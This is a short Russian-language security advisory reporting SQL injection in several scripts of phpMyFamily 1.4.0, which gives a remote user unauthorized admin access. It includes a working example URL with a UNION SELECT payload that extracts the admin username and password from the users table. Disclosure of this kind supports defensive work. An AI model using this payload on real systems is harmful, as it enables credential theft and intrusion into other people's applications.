Программа: phpMyFamily 1.4.0

Уязвимость позволяет удаленному
пользователю произвести SQL-инъекцию и
получить доступ к базе данных приложения.
Уязвимость обнаружена в сценариях people.php,
track.php, edit.php, document.php, census.php из-за отсутствия
фильтрации входных данных. Удаленный
пользователь может получить
неавторизованный административный доступ
к приложению, выполнить произвольные SQL
команды.

Пример:

http://[host]/[path]/people.php?person=00002’%20UNION%20SELECT%20
NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users %20%20WHERE%20admin=’Y’%20LIMIT%201,1/*

Оставить мнение